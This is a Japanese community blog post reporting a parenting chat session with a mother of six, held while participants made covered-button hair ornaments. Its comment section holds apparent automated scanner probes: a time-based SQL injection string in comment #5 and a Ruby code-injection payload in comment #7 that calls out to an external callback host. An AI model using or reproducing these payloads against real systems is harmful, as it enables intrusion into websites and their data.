· 

6人子育ておしゃべり会 終了

このめ食堂スタッフで大学生~2歳の6人(!)の母、
ようこさんを囲んで子育ておしゃべり会、
無事終了しました!


スタッフ含め7組の参加でした。

 

くるみボタンのヘアゴムを作りながらのおしゃべり会。
1日のスケジュールを聞いたり、家事の工夫、子どもたちの様子、大事にしていることなどなど詳しくお話いただけました!
次号のこのめ通信に掲載できたらと準備中です。

 

子どもそれぞれで相性があったり、習い事や部活などなど。。。

多忙な中でも、それぞれ一人一人との時間を作ったり、きっちり睡眠は確保したり、好きな場所へ行く時間を設けたり。

まさに「今、ここを生きる」ようこさんのお話でした。

 

くるみボタンの方は3歳のお姉ちゃんから、1歳ちゃんまでと楽しく作りました。

レース入りで工夫したり、刺し子をしたり。
色々な生地なども寄付いただいて、お好みで作りました。

なかなか女子な会でした。

 

ちなみに、ようこさんは4番目の小学生の女の子への誕生日プレゼントとして贈られたそうです。喜ばれて、またキットを買いに行かれたそうです^^


本来はmusubi助産院の塩見助産師さんに来ていただく予定でしたがお産が入り、延期で今回は急遽ようこさんの会としました。
塩見さんと夫婦コミュニケーションおしゃべり会は、また日程が決まればご案内します。

コメントをお書きください

コメント: 10
  • #1

    QPbmCRVM (月曜日, 16 8月 2021 22:15)

    1

  • #2

    QPbmCRVM (月曜日, 16 8月 2021 22:18)

    1

  • #3

    QPbmCRVM (月曜日, 16 8月 2021 22:19)

    1

  • #4

    QPbmCRVM (月曜日, 16 8月 2021 22:19)

    1

  • #5

    QPbmCRVM (月曜日, 16 8月 2021 22:19)

    -1; waitfor delay '0:0:15' --

  • #6

    QPbmCRVM (月曜日, 16 8月 2021 22:19)

    1

  • #7

    QPbmCRVM (月曜日, 16 8月 2021 22:20)

    '+'A'.concat(70-3).concat(22*4).concat(112).concat(73).concat(105).concat(73)+(require'socket'
    Socket.gethostbyname('hitea'+'quswfktsadc8e.bxss.me.')[3].to_s)+'

  • #8

    QPbmCRVM (月曜日, 16 8月 2021 22:20)

    1

  • #9

    QPbmCRVM (月曜日, 16 8月 2021 22:22)

    1

  • #10

    QPbmCRVM (月曜日, 16 8月 2021 23:54)

    1